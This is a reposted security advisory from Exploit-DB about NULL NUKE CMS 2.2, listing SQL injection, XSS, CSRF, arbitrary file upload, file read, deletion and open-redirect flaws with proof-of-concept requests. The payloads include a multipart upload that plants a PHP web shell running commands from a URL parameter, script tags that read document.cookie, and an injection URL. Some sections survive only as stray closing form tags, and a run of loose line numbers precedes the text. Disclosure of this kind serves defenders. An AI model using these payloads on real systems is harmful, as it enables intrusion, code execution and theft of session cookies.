NULL NUKE CMS 2.2 – Multiple Vulnerabilities

Exploit Database
114 阅读

作者： LiquidWorm

日期： 2014-04-29
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/33091/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

NULL NUKE CMS v2.2 Multiple Vulnerabilities

Vendor: nullwanton

Product web page: http://sourceforge.net/projects/nullnuke/

Affected version: 2.2 and 2.1 rc3

Summary: NULL-8x3-NUKE is a fast, powerful and secure cross platform CMS

for windows and Linux using base or full drive paths.

Desc: NULL NUKE CMS suffers from multiple remote vulnerabilities including

Stored/Reflected XSS, SQL Injection, Arbitrary File Upload, RCE, Arbitrary

File Deletion, Arbitrary File Access using absolute path and/or traversal,

Open Redirection, Parameter Traversal, and Cross-Site Request Forgery.

Tested on: Apache/2.4.7 (Win32)

PHP/5.5.6

MySQL 5.6.14

Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic

@zeroscience

Advisory ID: ZSL-2014-5185

Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5185.php

13.04.2014

---

-------------------------------------

[*] SQL Injection, CSRF (msgid param)

-------------------------------------

http://localhost/nullnuke/msgbox.php?nxt=readmsg&view=1&msgid=7%27

----------------------------------------

[*] Stored XSS, CSRF (faqcattitle param)

----------------------------------------

<input type="hidden" name="faqcattitle" value='"><script>alert(document.cookie);</script>' />

</form>

</body></html>

-----------------------------------------------------------------------------------------

[*] Arbitrary File Upload at arbitrary location, CSRF, RCE (fupload[1], uploadpath param)

-----------------------------------------------------------------------------------------

POST /nullnuke22/admin.php?fct=file_types&nxt=fileSystem&upload=here HTTP/1.1

Host: localhost

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: keep-alive

Content-Type: multipart/form-data; boundary=---------------------------117202350024276

Content-Length: 786

-----------------------------117202350024276

Content-Disposition: form-data; name="fupload[1]"; filename="shell.php"

Content-Type: application/octet-stream

<?php passthru($_GET['cmd']); ?>

-----------------------------117202350024276

Content-Disposition: form-data; name="uploadpath"

C:/xampp/htdocs/nullnuke22/

-----------------------------117202350024276

Content-Disposition: form-data; name="_numfeilds"

-----------------------------117202350024276

Content-Disposition: form-data; name="uploadform"

Upload

-----------------------------117202350024276

Content-Disposition: form-data; name="unpack_archive"

-----------------------------117202350024276

Content-Disposition: form-data; name="addfeild"

-----------------------------117202350024276--

</form>

</body></html>

---------------------------------------------------

[*] Arbitrary File Deletion, CSRF (dfarray[] param)

---------------------------------------------------

</form>

</body></html>

-------------------------------------------------------------------------------------------

[*] Arbitrary File Read using absolute path, CSRF (file param, value needs to be in base64)

-------------------------------------------------------------------------------------------

http://localhost/nullnuke22/admin.php?fct=file_types&nxt=getfile&path=&file=QzpcdGVzdC50eHQ=

- QzpcdGVzdC50eHQ= (C:\test.txt)

-------------------------------------------

[*] Open Redirect, CSRF (redirectlgn param)

-------------------------------------------

</form>

</body></html>

-----------------------------------------------------------------

[*] Reflected XSS, CSRF (upload param, Referer HTTP Header field)

-----------------------------------------------------------------

http://localhost/nullnuke22/admin.php?fct=file_types&nxt=fileSystem&upload=here1f454"><script>alert(1);</script>6747f198ae5

GET /nullnuke22/login.php?nxt=chklogin&uname=admin&pass=admin&remlogin=0&redirectlgn=http%3A%2F%2Flocalhost%2Fnullnuke22%2Fadmin.php%3Ffct%3Dfile_types%26nxt%3DfileSystem%26upload%3Dhere&stripit_form=uname%7Cpass&mpn_sectype=1 HTTP/1.1

Host: localhost

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://www.google.com/search?hl=en&q=b55ec"><script>alert(document.cookie);</script>bb8d1b11bd9304d5f

Connection: keep-alive